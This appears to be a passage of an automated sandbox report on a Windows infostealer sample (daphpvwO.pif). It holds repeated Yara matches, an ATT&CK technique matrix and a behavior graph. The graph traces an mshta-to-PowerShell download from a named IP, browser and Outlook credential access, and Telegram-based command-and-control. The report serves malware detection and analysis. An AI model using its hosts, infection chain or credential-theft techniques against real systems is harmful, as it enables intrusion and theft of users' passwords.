                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  Source: C:\Users\user\Links\daphpvwO.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  12
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts112
                  Command and Scripting Interpreter
                  Logon Script (Windows)1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares11
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell
                  Login Hook312
                  Process Injection
                  4
                  Software Packing
                  NTDS27
                  System Information Discovery
                  Distributed Component Object Model1
                  Input Capture
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets241
                  Security Software Discovery
                  SSHKeylogging24
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials41
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync3
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                  Virtualization/Sandbox Evasion
                  Network Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634283 Sample: niceworkingskilldevelopedwi... Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 56 reallyfreegeoip.org 2->56 58 api.telegram.org 2->58 60 2 other IPs or domains 2->60 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 78 17 other signatures 2->78 11 mshta.exe 1 2->11         started        signatures3 74 Tries to detect the country of the analysis system (by using the IP) 56->74 76 Uses the Telegram API (likely for C&C communication) 58->76 process4 signatures5 92 Suspicious command line found 11->92 94 PowerShell case anomaly found 11->94 14 cmd.exe 1 11->14         started        process6 signatures7 96 Detected Cobalt Strike Beacon 14->96 98 Suspicious powershell command line found 14->98 100 PowerShell case anomaly found 14->100 17 powershell.exe 45 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 54 192.227.228.22, 49704, 80 AS-COLOCROSSINGUS United States 17->54 44 C:\Users\user\AppData\Roaming\vcc.exe, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\...\vcc[1].exe, PE32 17->46 dropped 48 C:\Users\user\AppData\...\gbdknv1n.cmdline, Unicode 17->48 dropped 80 Loading BitLocker PowerShell Module 17->80 82 Powershell drops PE file 17->82 24 vcc.exe 6 17->24         started        28 csc.exe 3 17->28         started        file10 signatures11 process12 file13 50 C:\Users\user\Links\daphpvwO.pif, PE32 24->50 dropped 84 Antivirus detection for dropped file 24->84 86 Multi AV Scanner detection for dropped file 24->86 88 Drops PE files with a suspicious file extension 24->88 90 4 other signatures 24->90 30 daphpvwO.pif 15 2 24->30         started        34 cmd.exe 1 24->34         started        36 cmd.exe 1 24->36         started        52 C:\Users\user\AppData\Local\...\gbdknv1n.dll, PE32 28->52 dropped 38 cvtres.exe 1 28->38         started        signatures14 process15 dnsIp16 62 api.telegram.org 149.154.167.220, 443, 49712 TELEGRAMRU United Kingdom 30->62 64 checkip.dyndns.com 158.101.44.242, 49705, 80 ORACLE-BMC-31898US United States 30->64 66 reallyfreegeoip.org 104.21.16.1, 443, 49706 CLOUDFLARENETUS United States 30->66 102 Detected unpacking (changes PE section rights) 30->102 104 Detected unpacking (overwrites its own PE header) 30->104 106 Tries to steal Mail credentials (via file / registry access) 30->106 108 Tries to harvest and steal browser information (history, passwords, etc) 30->108 40 conhost.exe 34->40         started        42 conhost.exe 36->42         started        signatures17 process18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.